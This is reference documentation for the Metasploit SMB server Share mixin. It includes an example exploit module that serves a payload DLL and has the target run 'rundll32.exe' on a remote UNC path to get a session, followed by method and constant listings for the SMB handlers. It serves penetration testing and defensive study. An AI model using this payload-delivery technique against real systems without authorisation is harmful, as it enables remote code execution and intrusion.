Module: Msf::Exploit::Remote::SMB::Server::Share
- Includes:
- Msf::Exploit::Remote::SMB::Server, Command::Close, Command::Negotiate, Command::NtCreateAndx, Command::ReadAndx, Command::SessionSetupAndx, Command::Trans2, Command::Trans2::FindFirst2, Command::Trans2::QueryFileInformation, Command::Trans2::QueryPathInformation, InformationLevel::Find, InformationLevel::Query
- Defined in:
- lib/msf/core/exploit/remote/smb/server/share.rb,
lib/msf/core/exploit/remote/smb/server/share/command.rb,
lib/msf/core/exploit/remote/smb/server/share/command/close.rb,
lib/msf/core/exploit/remote/smb/server/share/command/trans2.rb,
lib/msf/core/exploit/remote/smb/server/share/command/negotiate.rb,
lib/msf/core/exploit/remote/smb/server/share/command/read_andx.rb,
lib/msf/core/exploit/remote/smb/server/share/information_level.rb,
lib/msf/core/exploit/remote/smb/server/share/command/nt_create_andx.rb,
lib/msf/core/exploit/remote/smb/server/share/information_level/find.rb,
lib/msf/core/exploit/remote/smb/server/share/information_level/query.rb,
lib/msf/core/exploit/remote/smb/server/share/command/session_setup_andx.rb,
lib/msf/core/exploit/remote/smb/server/share/command/trans2/find_first2.rb,
lib/msf/core/exploit/remote/smb/server/share/command/trans2/query_file_information.rb,
lib/msf/core/exploit/remote/smb/server/share/command/trans2/query_path_information.rb
Overview
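# Minimal example of a module built on the Share mixin: it serves a single
# DLL whose contents are generated from the selected payload, and the
# target is expected to load it over the UNC path printed at startup.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::SMB::Server::Share

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Example Exploit",
      'Description'    => %q{
        Example exploit, the Server shares a DLL embedding the payload. A session
        can be achieved by executing 'rundll32.exe \\srvhost\share\test.dll,0' from
        the target.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Matthew Hall',
          'juan vazquez'
        ],
      'References'     =>
        [
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3074']
        ],
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows XP SP3 / Windows 2003 SP2', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Mar 02 2015",
      'DefaultTarget'  => 0))

    # Give the shared file a fixed, DLL-looking default name instead of the
    # random one the mixin would otherwise pick.
    register_options(
      [
        OptString.new('FILE_NAME', [ false, 'DLL File name to share', 'test.dll'])
      ], self.class)

    # The contents are generated from the payload in #primer, so the
    # mixin's FILE_CONTENTS path option must not be offered to the operator.
    deregister_options('FILE_CONTENTS')
  end

  # Runs once the server is listening: build the payload DLL and announce
  # the UNC path the target must load.
  def primer
    self.file_contents = generate_payload_dll
    print_status("File available on #{unc}...")
  end
end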
Defined Under Namespace
Modules: Command, InformationLevel
Constant Summary collapse
- FLAGS =
CONST::FLAGS_REQ_RES | CONST::FLAGS_CASE_SENSITIVE
- FLAGS2 =
CONST::FLAGS2_UNICODE_STRINGS | CONST::FLAGS2_EXTENDED_SECURITY | CONST::FLAGS2_32_BIT_ERROR_CODES | CONST::FLAGS2_LONG_PATH_COMPONENTS
- CAPABILITIES =
CONST::CAP_UNIX_EXTENSIONS | CONST::CAP_LARGE_WRITEX | CONST::CAP_LARGE_READX | CONST::CAP_PASSTHRU | CONST::CAP_DFS | CONST::CAP_NT_FIND | CONST::CAP_LOCK_AND_READ | CONST::CAP_LEVEL_II_OPLOCKS | CONST::CAP_STATUS32 | CONST::CAP_RPC_REMOTE_APIS | CONST::CAP_NT_SMBS | CONST::CAP_LARGE_FILES | CONST::CAP_UNICODE | CONST::CAP_RAW_MODE
- CREATE_MAX_ACCESS =
CONST::SMB_READ_ACCESS | CONST::SMB_WRITE_ACCESS | CONST::SMB_APPEND_ACCESS | CONST::SMB_READ_EA_ACCESS | CONST::SMB_WRITE_EA_ACCESS | CONST::SMB_EXECUTE_ACCESS | CONST::SMB_DELETE_CHILD_ACCESS | CONST::SMB_READ_ATTRIBUTES_ACCESS | CONST::SMB_WRITE_ATTRIBUTES_ACCESS | CONST::SMB_DELETE_ACCESS | CONST::SMB_READ_CONTROL_ACCESS | CONST::SMB_WRITE_DAC_ACCESS | CONST::SMB_WRITE_OWNER_ACCESS | CONST::SMB_SYNC_ACCESS
- TREE_CONNECT_MAX_ACCESS =
CONST::SMB_READ_ACCESS | CONST::SMB_READ_EA_ACCESS | CONST::SMB_EXECUTE_ACCESS | CONST::SMB_READ_ATTRIBUTES_ACCESS | CONST::SMB_READ_CONTROL_ACCESS | CONST::SMB_SYNC_ACCESS
Constants included from Msf::Exploit::Remote::SMB::Server
CONST, CRYPT, EVADE, UTILS, XCEPT
Instance Attribute Summary collapse
-
#file_contents ⇒ String
The contents of the provided file.
-
#file_name ⇒ String
The file name of the provided UNC.
-
#folder_name ⇒ String
The folder where the provided file lives.
-
#hi ⇒ Integer
The high 4 bytes for the file 'created time'.
-
#lo ⇒ Integer
The low 4 bytes for the file 'created time'.
-
#share ⇒ String
The share portion of the provided UNC.
Attributes included from Msf::Exploit::Remote::SocketServer
Instance Method Summary collapse
-
#get_file_contents(client:, file: '', folder: '') ⇒ String
Returns the file contents for the requested file.
- #initialize(info = {}) ⇒ Object
-
#setup ⇒ Object
Sets up the server configuration.
-
#smb_cmd_dispatch(cmd, c, buff) ⇒ Integer
Main dispatcher function.
-
#smb_conn(c) ⇒ Hash
New connection handler, executed when there is a new connection.
-
#srvhost ⇒ String
Builds the server address.
-
#unc ⇒ Object
Builds the UNC Name for the shared file.
Methods included from Msf::Exploit::Remote::SMB::Server
#on_client_close, #on_client_connect, #on_client_data, #smb_error, #smb_pool_update, #smb_recv, #smb_set_defaults, #smb_stop
Methods included from TcpServer
#on_client_close, #on_client_connect, #ssl, #ssl_cert, #ssl_cipher, #ssl_compression, #ssl_version, #start_service
Methods included from Msf::Exploit::Remote::SocketServer
#_determine_server_comm, #bindhost, #bindport, #cleanup, #cleanup_service, #exploit, #on_client_data, #primer, #regenerate_payload, #srvport, #start_service, #via_string
Methods included from InformationLevel::Query
#send_info_basic_res, #send_info_network_res, #send_info_standard_res, #smb_cmd_trans_query_file_info_basic, #smb_cmd_trans_query_file_info_standard, #smb_cmd_trans_query_path_info_basic, #smb_cmd_trans_query_path_info_network, #smb_cmd_trans_query_path_info_standard
Methods included from InformationLevel::Find
#send_find_file_both_directory_info_res, #send_find_file_names_info_res, #send_find_full_directory_info_res, #smb_cmd_find_file_both_directory_info, #smb_cmd_find_file_full_directory_info, #smb_cmd_find_file_names_info
Methods included from Command::Trans2::QueryPathInformation
#smb_cmd_trans2_query_path_information
Methods included from Command::Trans2::QueryFileInformation
#smb_cmd_trans2_query_file_information
Methods included from Command::Trans2::FindFirst2
Methods included from Command::Trans2
#normalize_path, #send_trans2_res, #smb_cmd_trans2, #smb_expand
Methods included from Command::SessionSetupAndx
#send_session_setup_andx_res, #smb_cmd_session_setup_andx
Methods included from Command::ReadAndx
#send_read_andx_res, #smb_cmd_read_andx
Methods included from Command::NtCreateAndx
#send_nt_create_andx_res, #smb_cmd_nt_create_andx
Methods included from Command::Negotiate
#send_negotitate_res, #smb_cmd_negotiate
Methods included from Command::Close
#send_close_res, #smb_cmd_close
Instance Attribute Details
#file_contents ⇒ String
Returns The contents of the provided file.
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 182 def file_contents @file_contents end |
#file_name ⇒ String
Returns The file name of the provided UNC.
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 173 def file_name @file_name end |
#folder_name ⇒ String
Returns The folder where the provided file lives.
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 170 def folder_name @folder_name end |
#hi ⇒ Integer
Returns The high 4 bytes for the file 'created time'.
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 176 def hi @hi end |
#lo ⇒ Integer
Returns The low 4 bytes for the file 'created time'.
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 179 def lo @lo end |
#share ⇒ String
Returns The share portion of the provided UNC.
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 167 def share @share end |
Instance Method Details
#get_file_contents(client:, file: '', folder: '') ⇒ String
Returns the contents to serve for the requested file. It is intended to be overridden by modules so they can customize the file contents per request, and will become more useful once multiple files are supported.
Returns the file contents for the requested file
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 234 def get_file_contents(client:, file: '', folder: '') file_contents end |
#initialize(info = {}) ⇒ Object
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 184 def initialize(info = {}) super ( [ OptString.new('SHARE', [ false, 'Share (Default Random)']), OptString.new('FILE_NAME', [ false, 'File name to share (Default Random)']), OptString.new('FOLDER_NAME', [ false, 'Folder name to share (Default none)']), OptPath.new('FILE_CONTENTS', [ false, 'File contents (Default Random)']) ], Msf::Exploit::Remote::SMB::Server::Share) end |
#setup ⇒ Object
Sets up the server configuration.
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 197 def setup super self.folder_name = datastore['FOLDER_NAME'] self.share = datastore['SHARE'] || Rex::Text.rand_text_alpha(4 + rand(3)) self.file_name = datastore['FILE_NAME'] || Rex::Text.rand_text_alpha(4 + rand(3)) t = Time.now.to_i self.hi, self.lo = ::Rex::Proto::SMB::Utils.time_unix_to_smb(t) # The module has an opportunity to set up the file contents in the "primer callback" if datastore['FILE_CONTENTS'] File.open(datastore['FILE_CONTENTS'], 'rb') { |f| self.file_contents = f.read } else self.file_contents = Rex::Text.rand_text_alpha(50 + rand(150)) end end |
#smb_cmd_dispatch(cmd, c, buff) ⇒ Integer
Main dispatcher function. Takes the client data and performs a case switch on the command (e.g. Negotiate, Session Setup, Read file, etc.)
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 268 def smb_cmd_dispatch(cmd, c, buff) smb = @state[c] pkt = CONST::SMB_BASE_PKT.make_struct pkt.from_s(buff) #Record the IDs smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID'] smb[:user_id] = pkt['Payload']['SMB'].v['UserID'] smb[:tree_id] = pkt['Payload']['SMB'].v['TreeID'] smb[:multiplex_id] = pkt['Payload']['SMB'].v['MultiplexID'] case cmd when CONST::SMB_COM_NEGOTIATE return smb_cmd_negotiate(c, buff) when CONST::SMB_COM_SESSION_SETUP_ANDX word_count = pkt['Payload']['SMB'].v['WordCount'] if word_count == 0x0d # Share Security Mode sessions return smb_cmd_session_setup_andx(c, buff) else print_status("SMB Share - #{smb[:ip]} Unknown SMB_COM_SESSION_SETUP_ANDX request type, ignoring... ") return smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS) end when CONST::SMB_COM_TRANSACTION2 return smb_cmd_trans2(c, buff) when CONST::SMB_COM_NT_CREATE_ANDX return smb_cmd_nt_create_andx(c, buff) when CONST::SMB_COM_READ_ANDX return smb_cmd_read_andx(c, buff) when CONST::SMB_COM_CLOSE return smb_cmd_close(c, buff) else vprint_status("SMB Share - #{smb[:ip]} Unknown SMB command #{cmd.to_s(16)}, ignoring... ") return smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS) end end |
#smb_conn(c) ⇒ Hash
New connection handler, executed when there is a new connection.
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 249 def smb_conn(c) @state[c] = { :name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :multiplex_id => rand(0xffff), :process_id => rand(0xffff), :file_id => 0xdead, :dir_id => 0xbeef } end |
#srvhost ⇒ String
Builds the server address.
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 241 def srvhost datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST'] end |
#unc ⇒ Object
Builds the UNC Name for the shared file
# File 'lib/msf/core/exploit/remote/smb/server/share.rb', line 216 def unc if folder_name path = "\\\\#{srvhost}\\#{share}\\#{folder_name}\\#{file_name}" else path = "\\\\#{srvhost}\\#{share}\\#{file_name}" end path end |